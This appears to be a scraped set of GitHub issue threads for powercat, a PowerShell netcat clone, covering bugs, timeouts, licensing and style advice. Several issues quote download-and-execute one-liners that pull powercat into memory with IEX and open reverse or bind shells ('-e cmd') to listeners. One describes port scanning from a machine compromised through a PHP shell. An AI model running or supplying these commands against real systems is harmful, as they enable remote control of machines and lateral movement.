besimorhino / powercat Goto Github PK

I'm doing an important basic test because this is the most useful use case for me. It's final use will be NAT bypass or NAT passthrough, whatever you like to call it :). Following tests have been performed on a basic LAN.

On Workstation A (Windows 7), I'm starting a client:

powercat -c 192.168.100.22 -p 8000 -r tcp:localhost:3389 -rep

Expected behavior: client must keep trying to connect to listener over and over again. At this point, a listener has not been started. So...

On Windows workstation B (Windows 8.1), at an arbitrary moment, I'm starting a listener:

Powercat -l -p 8000 -r tcp:3389

Goal here is that when I boot workstation B and start the listener, the client will connect successfully within 60 seconds. 60 seconds being the default timeout.

-t Timeout option. Default: 60 [int32]
-rep Repeater. Restart after disconnecting. [Switch]

I think the behavior of -rep might be different from what I expect. If so, is it possible to include this behavior as a feature?

many thanks,
Jeroen

I Use the powershell command for downloading powercat, It says script contains malicious content

Hi,
I´m trying to install Powercat, but i´m getting this error:

Hello, is this normal behavior for the powercat that it does not return the value immediately from the other node?

It returns the value if i press enter after i run the command. Any idea if it is possible to implement a way not to wait for the 'enter' ?

Maybe I'm missing something, but there appears to be no way to detect connection errors - no exception/error is thrown/written, and $? evaluates to True in the following situations:

• specified host doesn't exist (timeout on connection)
• connection rejected

Question, I was at the bsideslv powercat talk. You were talking about a SSL enabled version that was just having issues with the server side stuff. I'd love to see about helping out with that, is there any chance you could put what you've worked on in a branch or something?

I'm trying a powercat with a -t 2 for a two second timeout and seeing 2 minutes. Actually I see two minute timeout regardless of what I set -t

PS C:\Users\tfulmer> date;powercat -c 10.10.37.111 -p 22 -t 2;date

Thursday, February 23, 2017 3:22:40 PM
SSH-2.0-OpenSSH_7.1
Thursday, February 23, 2017 3:24:40 PM

When trying to install PowerCat directly using invoke-expression (IEX), I get the following error in Powershell 7:

Invoke-Expression: This script contains malicious content and has been blocked by your antivirus software.

I'm on Windows 10 with built-in Windows Defender.

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/powercat.ps1');powercat -c 10.0.2.4 -p 1234 -e cmd"

I am using this command for downloading powercat from my kali server and then opening a shell connection, But it says this error

https://www.virustotal.com/gui/url/706efd6c741e4562c633433974e2902950b82b2be2c2d794a0acdd10250ef7d1/detection

Was curious if there was bug transferring files, our lab was a windows 7 client(pshell 2.0) going to server 2012(pshell 4) we couldn't get it to transfer files; all other features worked great, got them talking, shells opened, but following the exact instructions(main page) we couldn't get the files to transfer.
Appreciate any suggestions, and great work on a super cool tool!!

We got ncat working in the same scenario but would really like to have the ability to use powercat as well.

for example

powershell.exe -E 'xx.ps1'

error : tells me it is not base64

i know it is probably utf-16 format issues, but i want to know how to fix it thanks

Perhaps I'm misunderstanding how to use this utility, but basically I'm looking for socat like functionality, where I open a listener and it persists, listening for incoming data on the specified port. in socat it would be: socat TCP-LISTEN:6142,fork stdout, which in powercat I would think would be powercat -l -p 6142 however, using this from a PS prompt, the socket is closed as I cannot telnet into it. How do you use this script so that it'll persist?

I am tying to connect to a dnscat2 server. I use the --security open setting, I assume that is correct, because I see no way to add a psk with powercat(yet!).

But im not getting a session. Any help on how to set this up would be great!

got a little farther. I set a dns domain on powercat and dnscat2 and it seems to connect.
I can enter a session now from dnscat back through but I have not commands or shell access.

When trying to connect like so, all goes ok: telnet localhost 443

Then I type the letter d and immediately, I get an error:
[code]
PS H:> dIEX : The term 'd' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:172 char:61

•         try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExec
  

  ut ...

•                                                         ~~~~~~~~~~~~~~~~~~
  

  ~~
  • CategoryInfo : ObjectNotFound: (d:String) [Invoke-Expression], Co
    mmandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS H:>

Installed PS version:

PS H:> $PSVersionTable.PSVersion

Major Minor Build Revision

3 0 -1 -1

Either this is a bug, or I'm doing somthing wrong:)

Some recommendations in style and functionality

• PS functions follow the convention of ver-noun, this could be Invoke-PowerCat in the main function
• It is PS not Bash so help should be in comment based form so it is discoverable and parable by Get-Help and not use a -h/-help parameter (Run in a PowerShell console 'help about_Comment_Based_Help')
• The main function should be an advanced function with cmdletbinding so as to manage parameters properly (help about_Functions_CmdletBindingAttribute and help about_Functions_Advanced_Parameters)
• This is better suited as a module with a proper manifest where the main function is exported while the helper ones are hidden from the user so it can be used as a proper tool and allow for module autoloading, get-command discovery ..etc. (Look at help New-ModuleManifest -full)
• Parameter should be full named parameters and not single letters or be aliased as single letters, PowerShell behaves like Cisco IOS where for example -UDP can be -U or -UD as long as it is unique enough vs the other parameters.

The community and MS are working on a Style Guide and Best Practices guide https://github.com/PoshCode/PowerShellPracticeAndStyle I know I made the recommendations to the original author but since I see it is being maintained by others now I thought I would repeat them :)

The bind shell powercat -l -p 4444 -e cmd.exe does not return a prompt until I press Up Arrow in the prompt running powercat.

This may be due to latency involved with an OpenVPN/rdesktop set-up, but this latency would likely be involved in operational use. I did not attempt to recreate locally to see if latency was a factor.

Replication:
In PowerShell:
powercat -v -l -p 4444 -e cmd.exe
The prompt will report: Listening on [0.0.0.0] (port 443)
On connecting device:
nc -nv 123.123.123.123 4444

After connecting, the connecting device displays:
(UNKNOWN) [123.123.123.123] 4444 (?) open
The bind device does not display the connection in the prompt, but the connection is visible in netstat.

In PowerShell Prompt:
<press up arrow>
The prompt will report Connection from [123.123.123.123] port [tcp] accepted (source port 5555)
and proceed as normal.

Hi,

I'm using Powercat to achieve a remote shell and after this, execute a port scan over other machines that the infected machine have visibilization.

I'm executing the port scaning of Powercat from memory using the folowing command:

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); (21,22,80,443) | % {powercat -c 172.16.11.33 -p $_ -t 1 -Verbose}

When I execute it, the remote shell disconnected and the result appear on the navigator which is used to infect the machine via PHP shell.

Why does it happen? How can I fix it?

Thanks!

If you open 2 copies of powercat pointing at each other, they sit there chewing through tons and tons of CPU, just bouncing around checking to see if there is anything to read. On my laptop, each copy pulls 10% of the CPU, and causes the fan to spin up. Not exactly "stealthy". It'd be a bit of rewrite, but it looks like everything is already using AsyncResult stuff, if it built a list of all the AsyncResults, it could do a WaitOne on that list, and then recheck everything and loop. Wouldn't be as clean as a callback based method, but it would be much much cleaner then currently.

Hi,

I setup a listener, "nc -l -p 443", then attempted to connect using Powercat. The following commands works successfully, "powercat -c 192.168.1.181 -p 443 -e cmd" however, using PowerShell mode, "powercat -c 192.168.1.181 -p 443 -ep" the connection is unsuccessful and causes both sides of the connection to exit (even nc on Kali crashes).

Enabling verbose output, the following is captured:
PS C:> Import-Module D:\GIT\Kieran-GitHub\powercat\powercat.ps1
PS C:> powercat -c 192.168.1.181 -p 443 -ep -Verbose
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Powershell
VERBOSE: Setting up Stream 1... (ESC/CTRL to exit)
VERBOSE: Connecting...
VERBOSE: Connection to 192.168.1.181:443 [tcp] succeeeded!
VERBOSE: Setting up Stream 2... (ESC/CTRL to exit)
VERBOSE: Stream 2 Setup Failure
VERBOSE: Closing Stream 1...
PS C:>

I spent a few hours looking through the code, adding some additional debug outputs etc. I also reviewed your change log from the past few commits.

The cause for Steam 2 setup to fail is that $Encoding has not been defined. It appears that the line

$Encoding = New-Object System.Text.AsciiEncoding

has been removed during some of the code re-factoring. This should be reintroduced as follows:

param($Stream1SetupVars)   
    try
    {
      $Encoding = New-Object System.Text.AsciiEncoding
      [byte[]]$InputToWrite = @()
      if($i -ne $null)

I have also made an additional update to my fork, changing the way that the $CommandToExecute variable is executed by Invoke-Expression (IEX). The code in question is:

          ##### Stream2 Read #####
          $Prompt = $null
          $ReturnedData = $null
          if($CommandToExecute -ne "")
          {
            try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
            catch{}
            $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
          }

Previously only default output was captured and sent back to the listener, this created two side effects.

Firstly, any information displayed via the write-error, write-verbose, write-debug or write-warning CMDLets will not get send from the client back to the listener machine. This can be easily aciveved by implementing redirection of 3> 4> and 5> (along with 2>) to stream 1.

Secondly, if you didn't correctly type the command you wanted to run, no output was received. If you typed a CMDLet incorrectly, say resolve-dns instead of resolve-dnsname, you would receive no feedback. This can be easily resolved by setting the returned bytes to be that of the $error variable, this can be achieved by updating the catch portion (which is currently empty).

The updated code block would be

          ##### Stream2 Read #####
          $Prompt = $null
          $ReturnedData = $null
          if($CommandToExecute -ne "")
          {
            try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 3>&1 4>&1 5>&1 | Out-String))}
            catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
            $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
          }

I will generate a pull request for you to merge these fixes and updates in, I have tagged the fixes as https://github.com/kjacobsen/powercat/tree/Powercat-EPIssue

Would it also be OK if I spent some time cleaning up this code standardizing this towards PowerShell best practices? I would really like to help putting in additional comments, error handling and more standardization.

Hi,
Can you document explicitly under which license you are distributed your code?
(without explicit mention, all rights are reserved)
You could add a LICENSE file or add a explicit mention in the README.md
Thanks

Please add a LICENSE with your copyright notice, I am interested in using your software for testing. It will become handy because there is no simple UDP listener that ships with Microsoft Windows (R). We always have to write one to test UDP connectivity. Almost all *nix operating systems come with OpenBSD-netcat or netcat-traditional. Thank you very much.

• Rishikeshan (L/S).

I get the following error if I pipe a message to powercat

> 'aaaaa' | powercat -c localhost -p 5514 -u
IEX : You cannot call a method on a null-valued expression.
At \\psf\home\Projects\powercat\powercat.ps1:932 char:18
+       $Output += IEX $InvokeString
+                  ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Invoke-Expression], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull,Microsoft.PowerShell.Commands.InvokeExpressionCommand